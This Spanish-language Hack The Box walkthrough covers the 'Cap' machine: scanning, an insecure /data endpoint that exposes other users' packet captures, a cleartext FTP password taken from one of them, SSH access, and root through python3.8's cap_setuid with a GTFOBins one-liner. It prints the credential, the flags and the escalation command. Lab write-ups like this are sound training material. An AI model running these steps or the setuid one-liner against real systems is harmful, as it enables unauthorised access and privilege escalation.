Cap

Sobre esta maquina: HTB

Sistema Operativo: Linux

Skills Usados:

  • ssh

  • data

  • suid

Primer escaneo:

nmap -p- --open -sS -T4 -Pn -n 10.10.10.245 -oN First_Scan PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 80/tcp open http

Escaneo de versiones y servicios:

Vemos lo que corre por el puerto 80:

(captura)

Enumeramos la web con whatweb:

nmap -p21,22,80 -sS -T4 -n -sVC 10.10.10.245 -oN SVC_Scann Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-27 22:50 EDT Stats: 0:01:27 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 66.67% done; ETC: 22:53 (0:00:43 remaining) Stats: 0:01:32 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 66.67% done; ETC: 22:53 (0:00:46 remaining) Nmap scan report for 10.10.10.245 Host is up (0.15s latency). PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA) | 256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA) |_ 256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519) 80/tcp open http gunicorn |_http-title: Security Dashboard |http-server-header: gunicorn | fingerprint-strings: | FourOhFourRequest: | HTTP/1.0 404 NOT FOUND | Server: gunicorn | Date: Wed, 28 May 2025 02:51:01 GMT | Connection: close | Content-Type: text/html; charset=utf-8 | Content-Length: 232 | | 404 Not Found |Not Found

|The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again. | GetRequest: | HTTP/1.0 200 OK | Server: gunicorn | Date: Wed, 28 May 2025 02:50:55 GMT | Connection: close | Content-Type: text/html; charset=utf-8 | Content-Length: 19386 | | | | | | Security Dashboard | | | | | | | | | <!-- amchar | HTTPOptions: | HTTP/1.0 200 OK | Server: gunicorn | Date: Wed, 28 May 2025 02:50:56 GMT | Connection: close | Content-Type: text/html; charset=utf-8 | Allow: GET, HEAD, OPTIONS | Content-Length: 0 | RTSPRequest: | HTTP/1.1 400 Bad Request | Connection: close | Content-Type: text/html | Content-Length: 196 | | | Bad Request | | |Bad Request | Invalid HTTP Version 'Invalid HTTP Version: 'RTSP/1.0'' | | 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port80-TCP:V=7.94SVN%I=7%D=5/27%Time=68367A11%P=x86_64-pc-linux-gnu%r(G SF:etRequest,15B4,"HTTP/1.0\x20200\x20OK\r\nServer:\x20gunicorn\r\nDate: SF:x20Wed,\x2028\x20May\x202025\x2002:50:55\x20GMT\r\nConnection:\x20close SF:\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x20 SF:19386\r\n\r\n\n<html\x20class="no-js"\x20lang="en SF:">\n\n\n\x20\x20\x20\x20<meta\x20charset="utf-8">\n\x20\x20\x20 SF:\x20<meta\x20http-equiv="x-ua-compatible"\x20content="ie=edge">\n\x SF:20\x20\x20\x20Security\x20Dashboard\n\x20\x20\x20\x20<me SF:ta\x20name="viewport"\x20content="width=device-width,\x20initial-sca SF:le=1">\n\x20\x20\x20\x20<link\x20rel="shortcut\x20icon"\x20type="im SF:age/png"\x20href="/static/images/icon/favicon.ico">\n\x20\x20\x20\x SF:20<link\x20rel="stylesheet"\x20href="/static/css/bootstrap.min.css SF:">\n\x20\x20\x20\x20<link\x20rel="stylesheet"\x20href="/static/css/ SF:font-awesome.min.css">\n\x20\x20\x20\x20<link\x20rel="stylesheet" SF:x20href="/static/css/themify-icons.css">\n\x20\x20\x20\x20<link\x20r SF:el="stylesheet"\x20href="/static/css/metisMenu.css">\n\x20\x20\x20 SF:\x20<link\x20rel="stylesheet"\x20href="/static/css/owl.carousel.mi SF:n.css">\n\x20\x20\x20\x20<link\x20rel="stylesheet"\x20href="/stati SF:c/css/slicknav.min.css">\n\x20\x20\x20\x20<!--\x20amchar")%r(HTTPOpt SF:ions,B3,"HTTP/1.0\x20200\x20OK\r\nServer:\x20gunicorn\r\nDate:\x20Wed, SF:\x2028\x20May\x202025\x2002:50:56\x20GMT\r\nConnection:\x20close\r\nCon SF:tent-Type:\x20text/html;\x20charset=utf-8\r\nAllow:\x20GET,\x20HEAD,\x2 SF:0OPTIONS\r\nContent-Length:\x200\r\n\r\n")%r(RTSPRequest,121,"HTTP/1.1 SF:\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\nContent-Type:\x20t SF:ext/html\r\nContent-Length:\x20196\r\n\r\n\n\x20\x20\n\x20 SF:x20\x20\x20Bad\x20Request\n\x20\x20\n\x20\x20\n\x20\x20\x20\x20

Bad\x20Request\n\x20\x20\x20\x20Inv SF:alid\x20HTTP\x20Version\x20'Invalid\x20HTTP\x20Version:\x20'R SF:TSP/1.0''\n\x20\x20\n\n")%r(FourOhFourRequest, SF:189,"HTTP/1.0\x20404\x20NOT\x20FOUND\r\nServer:\x20gunicorn\r\nDate:\x SF:20Wed,\x2028\x20May\x202025\x2002:51:01\x20GMT\r\nConnection:\x20close SF:r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x202 SF:32\r\n\r\n404\x20Not\x20FoundNot\x20Found</ SF:h1>The\x20requested\x20URL\x20was\x20not\x20found\x20on\x20the\x20 SF:server.\x20If\x20you\x20entered\x20the\x20URL\x20manually\x20please\x2 SF:0check\x20your\x20spelling\x20and\x20try\x20again.\n"); Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

whatweb 10.10.10.245 http://10.10.10.245 [200 OK] Bootstrap, Country[RESERVED][ZZ], HTML5, HTTPServer[gunicorn], IP[10.10.10.245], JQuery[2.2.4], Modernizr[2.8.3.min], Script, Title[Security Dashboard], X-UA-Compatible[ie=edge]

Enumeramos con go buster:

gobuster dir -u "http://10.10.10.245/" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 20 Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) [+] Url: http://10.10.10.245/ [+] Method: GET [+] Threads: 20 [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s Starting gobuster in directory enumeration mode /data (Status: 302) [Size: 208] [--> http://10.10.10.245/] /ip (Status: 200) [Size: 17447] /netstat (Status: 200) [Size: 33531] /capture (Status: 302) [Size: 220] [--> http://10.10.10.245/data/1]

despues de jugar un rato con el valor de data, nos damos cuenta que se pueden descargar escaneos de otros usuarios, descargamos el archivo pcap del dashboard y lo analizamos con wireshark:(capturas)Descubrimos que se ejecuta el protocolo ftp desde el usuario nathan hacia la maquina objetivo, revela su password asi que intentaremos conectarnos por ssh:password:Buck3tH4TF0RM3!

User: nathan ssh nathan@10.10.10.245 nathan@10.10.10.245's password: Buck3tH4TF0RM3!

Estamos dentro, ahora buscamos la primera flag:

nathan@cap:~$ dir user.txtnathan@cap:~$ cat user.txt 438f3ccb2df866d897564dc57ac81bdaListamos binarios SUID para ver si podemos escalar privilegios:find / -perm -4000 -user root 2>/dev/null | xargs ls- l /usr/bin/umount /usr/bin/newgrp /usr/bin/pkexec /usr/bin/mount /usr/bin/gpasswd /usr/bin/passwd /usr/bin/chfn /usr/bin/sudo /usr/bin/chsh /usr/bin/su /usr/bin/fusermount /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/snapd/snap-confine /usr/lib/openssh/ssh-keysign /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/eject/dmcrypt-get-device /snap/snapd/11841/usr/lib/snapd/snap-confine /snap/snapd/12398/usr/lib/snapd/snap-confine /snap/core18/2066/bin/mount /snap/core18/2066/bin/ping /snap/core18/2066/bin/su /snap/core18/2066/bin/umount /snap/core18/2066/usr/bin/chfn /snap/core18/2066/usr/bin/chsh /snap/core18/2066/usr/bin/gpasswd /snap/core18/2066/usr/bin/newgrp /snap/core18/2066/usr/bin/passwd /snap/core18/2066/usr/bin/sudo /snap/core18/2066/usr/lib/dbus-1.0/dbus-daemon-launch-helper /snap/core18/2066/usr/lib/openssh/ssh-keysign /snap/core18/2074/bin/mount /snap/core18/2074/bin/ping /snap/core18/2074/bin/su /snap/core18/2074/bin/umount /snap/core18/2074/usr/bin/chfn /snap/core18/2074/usr/bin/chsh /snap/core18/2074/usr/bin/gpasswd /snap/core18/2074/usr/bin/newgrp /snap/core18/2074/usr/bin/passwd /snap/core18/2074/usr/bin/sudo /snap/core18/2074/usr/lib/dbus-1.0/dbus-daemon-launch-helper /snap/core18/2074/usr/lib/openssh/ssh-keysign

Hay demasiados, intentamos con getcap:

nathan@cap:~$ getcap -r / 2>/dev/null /usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip /usr/bin/ping = cap_net_raw+ep /usr/bin/traceroute6.iputils = cap_net_raw+ep /usr/bin/mtr-packet = cap_net_raw+ep /usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep

Deste la pagina GTFOBINS conseguimos un exploit para cap_setuid usando python 3.8:ttps://gtfobins.github.io/gtfobins/python/?source=post_page-----eb9c97f2259c---------------------------------------#capabilities

Ejecutamos el comando de GTFOBINS de python en capabilities:

nathan@cap:$ cp /usr/bin/python3.8 . nathan@cap:$ python3.8 -c 'import os; os.setuid(0); os.system("bash")' root@cap:~#S

Somos root, buscamos la ultima flag:

root@cap:~# cd /root root@cap:/root# ls root.txt snap root@cap:/root# cat root.txt 57f1acc1d93f29a521f08d3777308093Y asi damos por finalizada esta maquina.

PreviousAntiqueNextPortSwigger

Last updated